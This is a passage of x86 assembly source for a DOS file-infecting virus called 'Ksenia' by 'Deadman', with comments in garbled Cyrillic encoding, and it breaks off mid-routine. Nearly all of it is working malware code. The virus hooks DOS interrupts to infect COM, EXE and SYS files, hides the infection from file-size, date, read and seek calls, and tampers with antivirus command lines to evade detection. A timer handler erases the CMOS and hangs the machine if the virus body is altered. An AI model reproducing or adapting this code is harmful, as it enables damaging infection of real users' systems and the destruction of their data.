PkZip/RAR/ARJ/LHA/ARC/DEFRAG/SPEEDISK/CHKDSK/ScanDisk/NDD/ADINF are running Intercepts Int 24h to disallow user be warned by a critial error message Virus was analysed by these AVs F-PROT 3.05b - No detection or warns AVP 3.0.Plat - No detection or warns DRWEB 4.11 - No detection or warns Deadman from hell. E-Mail: dman@mail.ru vsize equ eov-ksenia ; ᪮ msize equ eom-ksenia ; ࠧ ॡ㥬 v_id equ 0b52dh ; ⪠ (HEADER+12h) crlen equ 100h ; ࠧ 䭮 ஢騪 b equ ; ᮪饭 w equ d equ o equ mvs macro Dest,Sour ; 뫪 push Sour ; १ ⥪ pop Dest endm model tiny ; codeseg p386 org 100h ksenia: xor bp,bp ; 㦭 1- ᪠ call crc ; CRC mov checksum,eax call SaveRegs ; ࠭ 室 ॣ஢ jmp shield ; CRLEN १ࢨ஢ ⥫ org ksenia+crlen ; 䭮 push 3202h ; ⠭ 䫠 popf call SaveRegs ; ࠭ 室 ॣ஢ mov ah,30h ; ᨨ DOS int 21h ; ਬ ᫥ ip: mov bp,sp ; ᬥ饭 ࠦ 䠩 mov bp,[bp-6] ; ࠭ IP INT sub bp,offset ip ; 塞 ࠧ ᬥ饭 (delta) push ds ; ᮪ mvs ds,0ffffh ; ஢ mov si,07h ; FFFF:0005 ᮤন , ன mov dx,2eh ; 墠⠥ ᨬ "/", XOR xor dl,[si] ; 砥 pop ds lea si,endi-1+bp ; ஥ (७) mov cx,endi-shield-1 turbo: mov al,cs:[si] ; ⪠ : add cs:[si-1],al ; : byte1 byte2 byte3 byte4 sub si,dx ; : b1+b2 b2+b3 b3+b4 b4+b5 loop turbo shield: cmp cs:host+bp,"S" ; ஢ઠ ⥬ jz strategy ; ࠩ mov ax,1856h ; ஢ઠ ⢨ int 21h ; AH=18 - 㭪 cmp ax,3265h ; AX=3265 - , 㦥 jne exeinstall ; ; 饭 ࠢ ணࠬ complete: lea si,original+bp ; si-࠭ 砫 mov al,cs:host+bp ; 㧪 ⨯ cmp al,"S" ; ⥬ ࠩ? jz run_sys cmp al,"E" ; ᯮ塞 䠩? jz run_exe mov di,100h ; ⨯ ࠦ ணࠬ: COM push di ; ࠭ ⥪ mov cx,32 ; ⠭ ਣ쭮 rep movsb ; ணࠬ jmp LoadRegs ; । ࠢ 砫 ணࠬ run_sys: mov ax,cs:[si+12h] ; ⠭ ⪨ mov cs:[12h],ax ; ⠭ ᬥ饭 楤 mov ax,cs:[si+06h] ; ࠡ⪨ ⥣ mov cs:[06h],ax ; push ax ; ࠭ ᬥ饭 ⥪ jmp LoadRegs ; ⠭ ॣ஢ run_exe: mov ax,es add ax,010h add cs:[si+16h],ax ; .reloc add cs:[si+0eh],ax ; .reloc mov bp,sp mov [bp.rbx],si ; ࠭ 㪠⥫ call LoadRegs ; ⠭ ॣ஢ mov ss,cs:[bx+0eh] ; ⠭ ⥪ ᥣ mov sp,cs:[bx+10h] ; ⠭ 㪠⥫ ⥪ jmp d cs:[bx+14h] ; । ࠢ ; ⠫ 䠩 exeinstall: mov di,100h ; ES:DI = PSP:0100 mvs ds,cs ; DS:SI = lea si,ksenia+bp ; 㥬 ࠦ mov cx,msize ; ணࠬ ࠧ ᫥ PSP db 6ah,00h ; 㦠 ⥪ db 66h,68h ; ஢ db 0f3h,0a4h,0cah,6 push es offset done ; rep movsb / retn 06 mov ax,sp add ax,4 jmp far ptr ax done: mov ax,cs ; , ࠢ mov ds,ax ; ᬥ饭, 樨 mov seg0,ax ; ᥣ EPB mov seg1,ax mov seg2,ax call VectMan ; 㧪 墠 ஢ 뢠 call FixVirus ; ࠦ 䠩 mov ah,4ah ; 㬥 㦭 ࠧ mov bx,(msize+100h)/16+2 ; , 뤥 ணࠬ mvs es,cs int 21h mov si,2ch ; PSP:2Ch = ᥣ 㦥 mov ds,[si] ; DS xor ax,ax mov si,-1 escan: inc si ; ᪠ DW 0 cmp W [si],ax ; ᫥ 䠩 (ணࠬ), jne escan ; ன 襭 lea dx,[si+4] ; dx -> mov ax,cs ; ந樠㥬 ⥪ 㪠⥫ mov ss,ax ; - // lea sp,stacks+size stacks mov ax,4b00h ; ᪠ ⥫ lea bx,epb ; ES:BX = EPB int 21h mov si,2ch mov es,cs:[si] ; 祭 ᥣ 㦥 mov ah,49h ; ᢮ int 21h mov ax,cs ; ᪨㥬 ⠪, dec ax ; ᮤন ⮫쪮 PSP. ᥡ mov ds,ax ; ந 㣮 , ᫥騩 xor si,si ; אַ PSP. 襭 ணࠬ mov al,4dh ; 㤥 ᢮. xchg B [si],al mov W [si+3],0fh ; MCB  ।⠢ mov B [si+100h],al ; ப (PSP+0F0h) mov W [si+101h],8 ; mov W [si+103h],msize/16+2 mov ah,4dh ; AH=4Dh (WAIT) int 21h ; ErrorLevel 饭 ணࠬ mov ah,4ch ; AH=4Ch (EXIT) int 21h ; DOS 直 ७ ; ⠫ .SYS 䠩 Strategy: mvs ds,cs ; 樠 ᥣ⭮ ॣ mov si,sp ; 㧪 㪠⥫ mov bx,ss:[si.rbx] ; ⥪ mov es,ss:[si.res] ; lea si,reqhdr+bp mov [si],bx ; ࠭ 㪠⥫ 祩 mov [si+2],es ; ⥫ jmp complete ; । ࠢ ࠩ Interrupt: call SaveRegs ; ࠭ ॣ஢ mov ah,30h ; ᨨ DOS int 21h ; ਬ ᫥ ipX: mov bp,sp ; ᬥ饭 ࠦ 䠩 mov bp,[bp-6] ; ࠭ IP INT sub bp,offset ipX ; 塞 ࠧ ᬥ饭 (delta) mvs ds,cs ; 樠 DS lea si,original+bp ; 㪠⥫ ਣ쭮 lea di,intcall+bp ; 砫 ࠩ mov ax,[si+08] ; 㧪 ᬥ饭 楤 mov ds:[08],ax ; 뢠 ࠭ ᬥ饭 mov [di],ax ; 祩 ᮬ 楤 뢠 mov [di+02],cs ; ࠩ lea bx,reqhdr+bp ; 㪠⥫ les bx,[bx] ; 㧪 mov ax,es:[bx.0eh] ; ᬥ饭 , 㯭 ࠩ shr ax,4 ; 祭 ᥣ⭮ ⮢饩 ᬥ饭 add ax,es:[bx.10h] ; ᥣ sub ax,msize/10h+2 ; 㬥襭 㯭 ࠩ mov w es:[bx.0eh],0 ; ᬥ饭 ᫥ 㯭 mov es:[bx.10h],ax ; ᥣ ᫥ 㯭 sub ax,10h ; AX - ᥣ mov es,ax ; ࠭ ᥣ mov di,100h ; ॣ ᮪ lea si,[di+bp] ; 襭 ࠩ mov cx,msize cld rep movsb push es o tmps ; । ࠢ ᥣ retf tmps: call LoadRegs ; ⠭ ॣ஢ call d cs:intcall ; 맮 ࠩ (㭪 00: 樠) call SaveRegs ; ࠭ ॣ஢ mov ax,1856h ; ஢ઠ ⢨ int 21h ; AH=18 - 㭪 cmp ax,3265h ; AX=3265 - , 㦥 jz sfars ; mvs ds,cs ; 樠 ᥣ⭮ ॣ les bx,d reqhdr ; mov ax,es:[bx.0eh] ; ᬥ饭 , 㯭 ࠩ shr ax,4 ; 祭 ᥣ⭮ ⮢饩 ᬥ饭 add ax,es:[bx.10h] ; ᥣ cmp ax,intcall+2 ; ᥣ ࠩ jz sfars ; १ ࠩ? inc ax ; + 1 ࠣ push ax ; ࠭ add ax,msize/10h+2 ; 㢥祭 ࠭ mov w es:[bx.0eh],0 ; ᬥ饭 ᫥ 㯭 mov es:[bx.10h],ax ; ᥣ ᫥ 㯭 pop ax ; 㦥 ࠭ sub ax,10h ; AX - ᥣ mov es,ax ; ࠭ ᥣ mov di,100h mov si,di mov cx,msize ; ஢ ⥫ cld ; ६ ᥣ ⥫ rep movsb push es offset owns ; । ࠢ ⥫ retf ; ᥣ ᫥ ࠩ owns: call VectMan ; 㧪 墠 ஢ 뢠 sfars: call LoadRegs ; 㧪 ॣ஢ retf ; copyright db 'Ksenia.' db vsize/1000 mod 10+'0' db vsize/100 mod 10+'0' db vsize/10 mod 10+'0' db vsize mod 10+'0' db ' Version 1.1 Copyright (C) ',??date,' by Deadman',0 extens db '.com',0 ; ७ 䠩, db '.exe',0 ; 㥬 db '.sys',0 db 0 prms db 'AVPDOS32',0,0,' /M' ,0dh db 'DRWEB' ,0,0,' /NM' ,0dh db 'F-PROT' ,0,0,' /NOMEM',0dh db 0 AVs db 'ADINF',0 ; ண 㤥 db 'COMMAND',0 db 0 windows db 'WiNBooTDiR=',0 db 0 files db '\SYSTEM\CONAGENT.EXE',0 db '\COMMAND\MODE.COM',0 db '\COMMAND\ANSI.SYS',0 db '\HIMEM.SYS',0 db '\WIN.COM',0 db 0 stlock db 'PKZIP',0 ; ணࠬ, ६ ࠡ db 'RAR',0 ; ⪫ ⥫-㭪樨 db 'ARJ',0 db 'LHA',0 db 'ARC',0 db 'UUENCODE',0 db 'DEFRAG',0 db 'SPEEDISK',0 db 'SCANDISK',0 db 'CHKDSK',0 db 'NDD',0 db 'ADINF',0 db 0 funcs dw 1856h,tsrtest ; ஢ઠ ࠦ (NULL) dw 4AFFh,rehook ; re-墠 (SETBLOCK) dw 3DFFh,infect ; ࠦ (OPEN) dw 1857h,infect ; ࠦ (VIXFIRUS) dw 41FFh,infect ; ࠦ (DEL) dw 43FFh,infect ; ࠦ (CHMOD) dw 4BFFh,infect ; ࠦ (EXEC) dw 56FFh,infect ; ࠦ (REN) dw 6C00h,extinfect ; ࠦ (EXTOPEN) dw 7141h,infect ; ࠦ (LFN DEL) dw 7143h,infect ; ࠦ (LFN CHMOD) dw 7156h,infect ; ࠦ (LFN REN) dw 716Ch,extinfect ; ࠦ (LFN OPEN) dw 71A9h,extinfect ; ࠦ (LFN SERVER OPEN) dw 11FFh,fcbstealth ; ⥫ (FCB) dw 12FFh,fcbstealth ; ⥫ (FCB) dw 4EFFh,dtastealth ; ⥫ (DTA) dw 4FFFh,dtastealth ; ⥫ (DTA) dw 714Eh,lfnstealth ; ⥫ (LFN) dw 714Fh,lfnstealth ; ⥫ (LFN) dw 71A6h,infstealth ; ⥫ (LFN HANDLE INFO) dw 5700h,date_get ; ⥫ (GET DATE) dw 5701h,date_set ; ⥫ (SET DATE) dw 42FFh,seekstealth ; ⥫ (LSEEK) dw 3FFFh,readstealth ; ⥫ (READ) dw 40FFh,diswrite ; ⥫ (WRITE) dw 3EFFh,patchsft ; ४஢ SFT dw 44FFh,patchsft ; ४஢ SFT dw 45FFh,patchsft ; ४஢ SFT dw 46FFh,patchsft ; ४஢ SFT dw 68FFh,patchsft ; ४஢ SFT dw 0 ; ࠡ稪 뢠 08 (Virus Guard) vguard: call SaveRegs ; ࠭ ॣ஢ inc cs:delay ; ஢ઠ 㤥 ந室 ਬ୮ cmp cs:delay,18 ; ᥪ㭤 jb exit_guard mov cs:delay,0 call crc ; CRC ⥫ cmp cs:checksum,eax ; ࠢ ⠫ jz crc_ok mov ax,1681h ;  砫 DOS Critical Session int 2fh ; mov al,0ffh ; ஫ 뢠: out 21h,al ; 饭 뢠 mov cx,40h ; ࠥ CMOS cmos: mov ax,cx out 71h,al out 70h,al loop cmos jmp $ ; ᨬ 設 crc_ok: mov ax,1856h ; ஢塞, 모뢠 int 21h ; ࠡ稪 21- 뢠 饩 cmp ax,3265h ; 楯? je exit_guard mov ax,3521h ; int 21h int 21h call set_dup ; ⠭ 21- 뢠 㣮 lea dx,manager ; 㦭 ⠭ call chk_dup ; 室 , 㤠 㪠뢠 jnz reset ; ᫥ ᢮ lea dx,handler reset: mov ax,2521h ; ⠭ mvs ds,cs int 21h exit_guard: call LoadRegs jmp d cs:io08 ; ࠡ稪 뢠 21 handler: call chk_dup ; ஢ઠ, ⠭ jz manager ; 뢠 ᫥ 㧪 Win95 jmp D cs:io21p ; 祬 manager: call SaveRegs ; ࠭ ॣ mov cs:save_ax,ax ; ᮮ࠭ ࠬ஢ mov cs:save_bx,bx ; ᯮ짮 (Filename), ᫨ mov cs:save_es,es ; 㭪 = 4b00 ᪠ 䠩 - AV lea si,funcs ; ⠡窠, ன ࠡ뢠 fscan: cmp ah,cs:[si+1] ; 㦭 㭪樨 int 21 (dw F#, dw offset) jne lnext ; ࠢ al ⥪饩 祩 ⠡ cmp B cs:[si],0ffh ; ஢ઠ 㦭 ஢ન 㭪樨 je ljump cmp B cs:[si],al ; ஢ઠ 㭪樨 jne lnext ljump: call mcbcheck ; 㭪 : ஢ઠ MCB ( stealth) push W cs:[si+2] ; ६ ᬥ饭 ࠡ稪 㭪樨 jmp LoadRegs ; ⠭ ॣ lnext: add si,4 ; ६ ᫥ ⠡ cmp w cs:[si],0 ; ஢ઠ ⠡ jnz fscan call LoadRegs ; ࠡ稪 ⮩ 㭪樨 ⠪ jmp ExitHandler ; : ⤠ ࠢ exithandler: push ax ax es bx bp ; ࠭ ES:BX १ࢨ஢ call get_dup ; 祭 ਣ쭮 int 21h mov bp,sp mov [bp+6],bx ; ᢮ 祩 mov [bp+8],es ; ⥪ pop bp bx es ; ⠭ ॣ஢ ES:BX retf ; । ࠢ DOS ireturn: retf 2 ; 㭨⮦ 䫠 ⥪ ; ࠦ 䠩 extinfect: call SaveRegs ; ࠭ ⥪ ॣ mov dx,si jmp InfA infect: call SaveRegs ; ࠭ ⥪ ॣ InfA: call Hook24 ; ⠭ 24- 뢠 call Filename ; ஢ઠ ७ 䠩 jc noinf call ClearFileAttributesA jc noinf call CreateFileA ; ⨥ 䠩 R/W jc RAttr call Infect_Handle ; ஢ handle call CloseFile ; ⨥ 䠩 Rattr: call RestoreFileAttributesA Noinf: call Remove24 ; ⠭ ࠡ稪 int 24h call LoadRegs ; ⠭ ॣ஢ cmp ah,3dh ; ஢ઠ 㭪 䠩 je sftstealth ; 砥 ஢ 䠩 cmp ax,6c00h ; 㬥 je sftstealth ; SFT ⪮४஢ cmp ax,716ch ; je sftstealth ; cmp ax,71A9h ; je sftstealth ; jmp exithandler ; ; SFT stealth sftstealth: call int21 ; 㦭 䠩 call SaveRegs ; ࠭ ॣ஢ jc no_sft xchg ax,bx call CloseSFT ; SFT no_sft: call LoadRegs jmp ireturn ; FCB stealth fcbstealth: call int21 ; 맢 㭪 DOS call SaveRegs ; ࠭ ॣ஢ cmp al,0ffh ; -? jz no_fcb cmp cs:stf,0 ; ࠡ ? jnz no_fcb mov ah,2fh ; DTA call int21 cmp b es:[bx],0ffh ; ७ FCB? jne usual add bx,7 usual: lea si,[bx+19h] ; si -> 䠩 lea di,[bx+1dh] ; di -> 䠩 call sizst ; ⨥ 譨 no_fcb: call LoadRegs ; ⠭ ॣ஢ jmp ireturn ; DTA stealth dtastealth: call int21 ; 맢 㭪 DOS call SaveRegs ; ࠭ ॣ஢ jc no_dta ; 諨? cmp cs:stf,0 ; ࠡ ? jnz no_dta mov ah,2fh ; DTA call int21 lea si,[bx+18h] ; si -> 䠩 lea di,[bx+1ah] ; di -> 䠩 call sizst ; ⨥ 譨 no_dta: call LoadRegs ; ⠭ ॣ஢ jmp ireturn ; Win95 stealth infstealth: stc ; CF ⠭ call int21 ; 맢 㭪 DOS call SaveRegs ; ࠭ ॣ஢ jc no_win ; ok? cmp cs:stf,0 ; ࠡ ? jnz no_win mov ax,0 ; ६ Win95 ଠ mov si,dx lea di,[si+24h] ; ࠧ 䠩 lea si,[si+14h] ; 䠩 mvs es,ds jmp allw95 lfnstealth: call int21 ; 맢 㭪 DOS call SaveRegs ; ࠭ ॣ஢ jc no_win ; 諨? cmp cs:stf,0 ; ࠡ ? jnz no_win mov ax,si ; ଠ ६ lea si,[di+14h] ; 䠩 lea di,[di+20h] ; ࠧ 䠩 allw95: cmp ax,1 ; ஢ઠ ଠ ६ jz dos_date push si di ax ; ࠭ ࠬ஢ 饥 mov ax,71a7h ; ॢ ६ ଠ mov bl,0 ; Win95 ଠ DOS mvs ds,es ; SI 㪠뢠 call int21 ; ᥩ CX:DX ᮤঠ 筮 DOS ६ pop ax di si ; ⠭ ࠬ஢ mov [si],cx ; ࠭ ࠬ஢ FindDataRecord mov [si+2],dx dos_date: add si,2 ; si -> 䠩 call sizst ; di -> 䠩 sub si,2 cmp ax,1 ; ஢ઠ ଠ ६ jz no_win mov ax,71a7h ; ॢ ६ ଠ mov bl,1 ; DOS ଠ Win95 mov di,si ; DI -> buffer ६ mov cx,[di] ; ⥭ ६ ଠ DOS mov dx,[di+2] call int21 ; ᥩ ES:[DI] ᮤন ६ Win95 no_win: call LoadRegs ; ⠭ ॣ஢ jmp ireturn ; DATE stealth date_get: call OpenSFT ; SFT cmp cs:stf,0 ; ࠡ ? jnz no_seek call int21 ; call hidestm ; ᪨஢ clc jmp seek_ret date_set: call OpenSFT ; SFT call int21 ; ⠭ call correctdate ; ࠢ jmp seek_ret ; LSEEK stealth seekstealth: call OpenSFT ; SFT cmp cs:stf,0 ; ࠡ ? jnz no_seek call ioctl ; ஢ઠ 䠩 IOCTL jc no_seek call Inf_Check ; ஢? jnc no_seek push cx ; ࠭ CX cmp al,2 ; ஢ઠ ⨯ jne forw sub dx,vsize ; ᪨஢ 饣 䠩 sbb cx,0 ; ᤢ forw: call int21 ; ⠭ 㪠⥫ 砫 pop cx ; ⠭ CX jc seek_ret ; ⥪饩 樨 call seekhide ; ஢ lseek ⥫ mov ax,cs:seek_pos mov dx,cs:seek_pos+2 jmp seek_ret no_seek: call int21 ; 맮 DOS seek_ret: call CloseSFT ; SFT jmp ireturn ; READ stealth readstealth: call OpenSFT ; SFT cmp cs:stf,0 ; ࠡ ? jnz no_seek call ioctl ; ஢ઠ 䠩 IOCTL jc no_seek call Inf_Check ; ஢? jnc no_seek call SeekSave ; ࠭ 樨 㪠⥫ call int21 ; ⥭ jc seek_ret call SaveRegs ; ࠭ ॣ஢ mov di,dx ; 㡫஢ ᬥ饭 mov cs:nrbytes,ax ; ⢮ ⠭ cmp d cs:seek_pos,32 ; ? jae zone call crload ; 饥 砫 䠩 lea si,buffer ; SI -> 饥 砫 add si,cs:seek_pos ; SI -> ⥬ ᬥ饭 ⥭ mov cx,cs:nrbytes ; ⠥ ⢮ 㦭 add cx,cs:seek_pos ; ⥫ cmp cx,32 ; ⥭ । jbe $+5 ; ࠭ 砫 䠩? mov cx,32 sub cx,cs:seek_pos jcxz zone ; 砥 ⥭ 0 rhide: mov al,cs:[si] ; ஢ 砫 䠩 mov [di],al ; ਣ쭮 inc si inc di loop rhide zone: call seekhide ; 㥬 lseek call LoadRegs ; + 㬥襭 ᫠ ⠭ mov ax,cs:nrbytes ; jmp seek_ret ; ALL HANDLER stealth patchsft: call OpenSFT ; SFT jmp no_seek ; WRITE stealth diswrite: call OpenSFT ; SFT cmp cs:stf,0 ; ࠡ ? jnz no_seek call ioctl ; ஢ઠ 䠩 IOCTL jc no_seek call Inf_Check ; ஢? jnc no_seek call SaveRegs ; ࠭ ॣ஢ call SeekSave ; ࠭ 樨 㪠⥫ mvs ds,cs ; DS=CS call crload ; 㧪 ਣ쭮 砫 call seek2bof ; 㪠⥫ 砫 䠩 mov cx,32 ; ਣ쭮 䠩 lea dx,buffer call write xor cx,ax ; 訡? ⮣ ⮣, jnz disfail ; 祣 訡 㤥 ⮦! mov cx,-1 ; . .. mov dx,-vsize ; ࠦ ணࠬ call seekfrom_eof mov ah,40h ; १ 䠩 xor cx,cx ; 㤠塞 ⥫ ᮭ⥫ call int21 mov ah,68h ; 뢠 call int21 disfail: call RestoreSeek ; ⠭ 樨 㪠⥫ call LoadRegs ; ⠭ ॣ஢ jmp no_seek ; 室 ; ஢ઠ ஢ tsrtest: mov ax,3265h ; Hi, AX=3265 jmp ireturn ; 墠 int 21h rehook: call SaveRegs ; ࠭ ॣ஢ call chk_dup ; ஢ઠ, 㦥 jnz no_hook ; ⠭ call WinOldAp ; ஢ઠ, - cmp ax,cs:w95state ; ⠫樨 jz no_hook ; (뫠 㦥 Win95) mov ax,3521h ; 祭 int 21h int 21h mov ax,2521h ; ⠭ 뢠 lea dx,manager mvs ds,cs int 21h call set_dup ; ࠭ 㣮 祩 IVT no_hook: call LoadRegs ; ⠭ ॣ஢ jmp exithandler ; > SUBROUTINES < ; 㧪 墠 ஢ 뢠 VectMan: call SaveRegs ; ࠭ ॣ஢ mvs ds,cs ; 樠 ᥣ⭮ ॣ call WinOldAp ; 祭 ⠫樨 WinOldAp mov w95state,ax ; ࠭ 䫠 mov ax,3521h ; AH=35 AL=INT# - 㭪 祭 int 21h ; 뢠 AL mov io21p,bx ; ࠭ 祩 mov io21p+2,es call set_dup ; ⠭ 21- 뢠 㣮 mov ax,2521h ; ⠭ ᢮ ࠡ稪 lea dx,handler ; 뢠 int 21h mov ax,3508h ; 뢠 int 21h mov io08,bx ; ࠭ 祩 mov io08+2,es mov ax,2508h ; ⠭ 뢠 08h (⠩) lea dx,vguard ; ஢ન 楫⭮ int 21h call LoadRegs ; ⠭ ஢ ret get_dup: push ds si ; 㧪 ॣ஢ ES:BX ਣ mvs ds,0 ; ஬ 21- 뢠 mov si,63h*4 mov bx,[si] mov es,[si+2] pop si ds ret set_dup: push ds si ; ࠭ ES:BX 63- mvs ds,0 ; 뢠 mov si,63h*4 mov [si],bx mov [si+2],es pop si ds ret chk_dup: push ds si eax ; ஢ઠ 63- mvs ds,0 ; 뢠 mov si,63h*4 mov eax,[si] cmp d cs:io21p,eax pop eax si ds ret ; ஢ઠ ⨢ Win95 (ᯮ WinOldAp) WinOldAp: mov ax,1700h ; 㭪 WinOldAp Installation Check int 2fh ; ணࠬ, Win95 ret ; 32-ࠧ來 ० PE ଠ ; ࠦ 䠩 ; ᯮ STACKS ⢥ 䠩 FixVirus: call SaveRegs ; ࠭ ॣ஢ mov si,2ch ; ᬥ饭 2C PSP ࠭ ᥣ mov ds,cs:[si] ; 㦥 xor si,si ; ⮢ ᪠஢ 㦥 mvs es,cs ; ES:DI -> ࠬ 㦥 winbootdir lea di,windows FxD: call compare ; ࠢ 蠡 winbootdir jz FxedI ; 祩 㦥 DS:SI cmp w [si],0 ; ஢ઠ 砭 jz FxOUT ; ࠬ஢ inc si ; 㢥祭 㦥 jmp FxD ; ᪠ FxedI: lodsb ; ⮫쪮 横, ᢥ JZ xor al,'=' ; 砭 ६ jnz FxedI ; '=' mov ah,60h ; "TRUENAME" - CANONICALIZE FILENAME OR PATH lea di,stacks ; DS:SI - ४ MD, ES:DI - int 21h lea di,stacks ; DI - १ mvs ds,cs ; ⠭ DS ᥣ xor al,al ; १ mov cx,256 ; ࠩ 256- cld repne scasb jnz FxOUT ; 室 砥 訡 dec di ; DI 㪠뢠 ४ਨ cmp b [di-1],'\' ; ஢ઠ \\ jnz $+3 dec di mov bx,di ; 㡫஢ 㪠⥫ lea si,files ; SI 㪠뢠 ᯨ᮪ 䠩 䥪 FxVI: cmp b [si],0 ; ? jz FxOUT ; ⮬ 砥 室 mov di,bx ; ஢ । lodsb ; stosb or al,al jnz $-4 mov ax,1857h ; 맮 ७ 㭪樨 lea dx,stacks ; ஢ 䠩 DS:DX int 21h jmp FxVI ; ᫥騩 䠩 FxOUT: call LoadRegs ; ⠭ ॣ஢ ret ; Open/Close SFT - ணࠬ / ଠ쭮 SFT OpenSFT: call SaveRegs ; ࠭ ॣ஢ mov si,0 ; "Open" jmp Manipulate CloseSFT: call SaveRegs ; ࠭ ॣ஢ mov si,1 ; "Close" Manipulate: mov bp,bx ; ࠭ handle call ioctl ; ஢ઠ, 䠩 chardevice jc SFT_Error mov ax,1220h ; 祭 JFT ⮣ 䠩 int 2fh jc SFT_Error xor bx,bx mov bl,es:[di] ; BL = System file entry cmp bl,0ffh je SFT_Error mov ax,1216h ; 祭 SFT ES:DI int 2fh jc SFT_Error mov bx,bp ; ⠭ handle call Inf_Check ; ஢ઠ ஢ 䠩 jnc SFT_Error ; 室 砥 ⮣ 䠩 mov eax,vsize cmp si,0 ; "Open"? jz open neg eax open: add es:[di+11h],eax ; ࠭ SFT ࠧ mov dx,es:[di+0fh] ; 祭 䠩 call hidestm ; ⨥ 譨 100 cmp si,0 ; "Open"? jnz clsft ror dh,1 ; 㢥祭 䠩 add dh,100 rol dh,1 clsft: mov es:[di+0fh],dx ; ࠭ SFT_Error: call LoadRegs ; ⠭ ॣ஢ ret ; size stealth ; ES:SI -> 䠩 ; ES:DI -> 䠩 sizst: mov dx,es:[si] ; dx = 䠩 call hidestm ; ᪨஢ ஢ઠ 100 譨 jnc oklen ; 䠩 ஢? mov W es:[si],dx ; ⠭ ଠ 䠩 sub W es:[di],vsize ; ᪨஢ 饭 䠩 sbb W es:[di+2],0 oklen: ret hidestm: push dx ; ࠭ ⥪ shr dh,1 ; 䠩 cmp dh,100 ; ࠢ 100 pop dx ; ⠭ jb okinf ror dh,1 ; 䠩 sub dh,100 ; 譥 rol dh,1 ; stc ; 䠩 ࠦ! ret okinf: clc ret correctdate: mov ax,5700h ; ⠭ 䠩 ᨬ call int21 ; ⮣, ࠦ call HideStm ; ଠ쭠 call Inf_Check ; ஢ 䠩 ࠦ jnc okdat ror dh,1 add dh,100 rol dh,1 okdat: mov ax,5701h ; ⠭ ⪮४஢ call int21 ; 䠩 ret ; ஢ઠ 䠩 (AVs) ; ஢ઠ ७ 䠩 (Extens) ; SAVE_AX=4B00 ࠬ஢ cmdline Filename: call SaveRegs ; ࠭ ॣ஢ cld mov si,dx ; ᬥ饭 ॣ nfind: lodsb ; 䠩 cmp al,':' ; 襬 砥 㤥 ᫥ jz separ ; ᫥ "/", "\", ":" cmp al,'\' jz separ cmp al,'/' jnz store separ: mov dx,si ; ࠭ ᬥ饭 store: or al,al ; ஢ઠ ப (0) jnz nfind mov si,dx ; SI -> 䠩 xor di,di ; ७ gext: lodsb cmp al,'.' ; ७? jnz $+4 mov di,si or al,al jnz gext or di,di ; ᫨ 祪 䠩 jz Bad_File ; 㦥 뫮 lea bp,[di-1] ; ᥩ BP-७ 䠩, DX- mvs es,cs ; ES=CS cmp cs:save_ax,4b00h jne no_add mov si,dx ; SI -> 䠩 lea di,prms ; ⠡窠 (ଠ: avname,0,0,cmdline,0dh) scancmd: call compare ; ࠢ ᪠ ணࠬ jz addprm ; ।ᬮ७ ⠡ mov al,0dh mov cx,0ffffh repne scasb cmp b cs:[di],0 ; ⠡? jnz scancmd ; ⠡ - 饭 jmp no_add ; 㣠 ணࠬ addprm: push es ; ࠭ ES mov al,0 mov cx,0ffffh repne scasb lea si,[di+1] les bx,d cs:save_bx ; 㧪 ES:BX EPB les bx,es:[bx+2] ; 㧪 ப ES:BX mov di,bx getdx: inc di ; ᪠㥬 ப cmp b es:[di],0dh ; ப? jnz getdx mov cx,-1 ; 稪 ⥫쭮 ࠬ lods b cs:[si] ; 㧪 ࠬ stosb ; ࠭ ࠬ inc cx ; 㢥祭 稪 cmp al,0dh ; ஢ઠ 砭 ࠬ jnz $-6 add es:[bx],cl ; 㢥祭 ப pop es ; ⠭ ES no_add: mov si,bp lea di,extens ; ES:DI 㪠뢠 ⠡ call compare ; ࠧ襭묨 ७ﬨ jnz Bad_File ; ४⭮ ७? mov al,[si+1] ; 㧪 ࢮ ७ call upreg ; ॢ 孨 ॣ mov cs:host,al ; ⠭ 䫠 mov si,dx ; SI -> 䠩 lea di,AVs ; ES:DI -> ⠡ call compare ; ࠢ jz Bad_File ; 襥 call LoadRegs ; ⠭ ॣ஢ clc ; ⪠ CF ret Bad_File: call LoadRegs ; ⠭ ॣ஢ stc ; ⠭ CF ret ; ⠭ STF ᨬ ⥪饣 PSP/MCB ; ࠢ 1 ᫨ ⥪騩 MCB ਭ ணࠬ STLOCK ; ࠢ 0 ᫨ ⥪饣 MB ॣ஢ STLOCK mcbcheck: call SaveRegs ; ࠭ ॣ஢ mov ah,62h ; ᥣ ⥪饣 PSP call int21 dec bx ; 祭 ᥣ MCB mov ds,bx ; DS:SI 㪠뢠 MB mov si,08h ; lea di,stlock ; ES:DI 㪠뢠 mvs es,cs ; ᯨ᮪ STLOCK call compare ; ࠢ sete cs:stf ; ⠭ ⥫-䫠 call LoadRegs ; ⠭ ॣ஢ ret ; 室 ணࠬ ; COMPARE - ࠢ ; DS:SI - 筨 ; ES:DI - ⠡ (Data1,0,Data2,0,...,DataN,0,0) ; 室: ZF = 1 砥 ᮢ ; ⨭᪨ 㪢 祭 compare: call SaveRegs ; ࠭ ॣ஢ mov dx,si ; 㡫஢ ᬥ饭 筨 data1: mov si,dx ; ⠭ ᬥ饭 筨 data2: mov al,ds:[si] ; ⥭ 筨 mov ah,es:[di] ; ⥭ ⠡ inc di ; 㢥祭 ॣ஢ inc si ; call upreg ; ॢ ᨬ 孨 ॣ or ah,ah ; ᫨ ⠡ ࠧ 0 => jz equal ; => ᮢ cmp al,ah ; ⭮ ࠢ jz data2 ; ᫨ ᮢ, ஢塞 data3: cmp B es:[di],0 ; ᮢ, ६ ᫥饥 jz data4 ; inc di jmp data3 data4: inc di cmp B es:[di],0 ; ஢ઠ ᫥ jnz data1 ; ⠡ call LoadRegs ; ⠡ 稫: ᮢ cmp di,-1 ; ⪠ ZF ret ; 室 ணࠬ equal: call LoadRegs ; ⠭ ॣ஢ cmp al,al ; ⠭ ZF ret ; 室 ணࠬ ; Gets a random value [0..AX] xrandom: push bx cx dx si di mov si,ax mov ax,cs:random1 mov bx,cs:random2 mov cx,ax mov di,8405h mul di shl cx,3 add ch,cl add dx,cx add dx,bx shl bx,2 add dx,bx add dh,bl shl bx,5 add dh,bl add ax,1 adc dx,0 mov cs:random1,ax mov cs:random2,dx or si,si jz rnd_exit xor dx,dx div si xchg ax,dx rnd_exit: pop di si dx cx bx ret ; ணࠬ ⠭/ 뢠 ; ᪨ 訡 int 24h Hook24: call SaveRegs ; ࠭ 墠 xor ax,ax ; 뢠 ᪨ mov ds,ax ; 訡 int 24h mov si,24h*4 mov dx,cs lea ax,int24 xchg ax,[si] xchg dx,[si+2] mov cs:io24,ax mov cs:io24+2,dx call LoadRegs ret Remove24: call SaveRegs ; ⠭ int 24h xor 